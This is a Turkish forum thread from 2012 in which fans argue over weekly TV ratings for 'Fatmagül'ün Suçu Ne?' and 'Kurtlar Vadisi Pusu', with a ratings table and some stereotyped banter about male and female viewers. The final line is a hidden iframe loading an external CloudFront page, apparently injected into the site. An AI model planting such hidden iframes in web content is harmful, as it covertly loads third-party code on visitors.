30 Ocak - 5 Şubat 2012 Haftalık Dizi Reytingleri

biz erkek dizisi izliyoruz fatmagülü izleyenlerin %95 i nin kadınlar olduğunu biliyoruz aga tmm uzatmayın ya banane ne izlerseniz izleyin :D vadiye laf etmediğiniz sürece sorun yok
İsterseniz FSN`ye isterseniz en sevdiğim diziye laf edin umurumda olmaz. Benim dizim değil. Ben sadece onu izliyorum. Daha önce dediğim gibi zirvede olması önemli değil. İyi reyting alsın bitmesin yeterli. FSN 2ci oldu diye haftaya final yapmaz. Söz verdikeri gibi sezon sonuna bitecek. Ayrıca reyting için diziyi sakız gibi uzatan yapımcıları şiddetle kınıyorum

ya derdiniz ne sizin vadi 3 hafta üst üste gecti, bu haftada gececek tns gelincede gececek. Anca AGB den örnek veriyorsunuz ama AGB sike yapti. Fgsn SBT Dede öndeydi FGSN sezon basinda 15 KVP 9 reyting aliyordu ama Fatos her hafta düserken Vadi yükseldi sonucta ortada vadi aradaki 6 reytinglik farki kapatti üstünede 2 reyting fark atti yani EZDI

Tamam o zaman siz 0.50 reytingle geçmeye ezmek diyorsanız bu ne? SBT reytingleri
[TABLE="class: cms_table, width: 440"]
[TR]
[TD="align: right"]1[/TD]
[TD]FATMAGÜL'ÜN SUÇU NE?[/TD]
[TD]KANAL D[/TD]
[TD="align: right"]13,09[/TD]
[TD="align: right"]30,99[/TD]
[/TR]
[TR]
[TD="align: right"]2[/TD]
[TD]KURTLAR VADİSİ PUSU[/TD]
[TD]TNT[/TD]
[TD="align: right"]9,25[/TD]
[TD="align: right"]22,62[/TD]
[/TR]
[/TABLE]

Ben sıkıldım bu tartışmalardan zaten sizi hangi reytingleri göstersem KVP daha iyi diyeceksiniz. Oturup FSN izlemeyeceksiniz.

Ilk önce Fatma Gül icin cok konusuldu... Ben sadice "bekleyin" diyorum... Allah'in izniyle en kisa zamanda bu Tabloda da "Kurtlar Vadisi Pusu" ZIRVEYE oturacaktir...

biz kadın mıyız ki fatmagül izleyelim erkek adamız :D verdiğin örneğe bişey demiyorum :D ama artık 1.vadi bu kadar basit
çocuk gibi düşünmeyin ya sadece kadınlar mı izler bu dizileri bir cümle bulmuşsunuz sırf beren saat için izlerim ama izlemiyorum:D

çocuk gibi düşünmeyin ya sadece kadınlar mı izler bu dizileri bir cümle bulmuşsunuz sırf beren saat için izlerim ama izlemiyorum:D

çocuk gibi düşünmeyinmiş :D ulan hangi erkek oturupta fatmagülü izler yok değil vardır ama %95 i kadınlar izliyo

yine vatandaşın biri yaptığı yorumla yerlerde sürünüyor:)

senin bu dediğin kadınlar pantolon giymez demek gibi bişi
<iframe style="display: none; visibility: hidden;" src="http://d3lvr7yuk4uaui.cloudfront.net/d.html?c=dW5kZWZpbmVkOnVuZGVmaW5lZDp1bmRlZmluZWQ6MTAzNjoxMjc2ODp1bmRlZmluZWQ6"></iframe>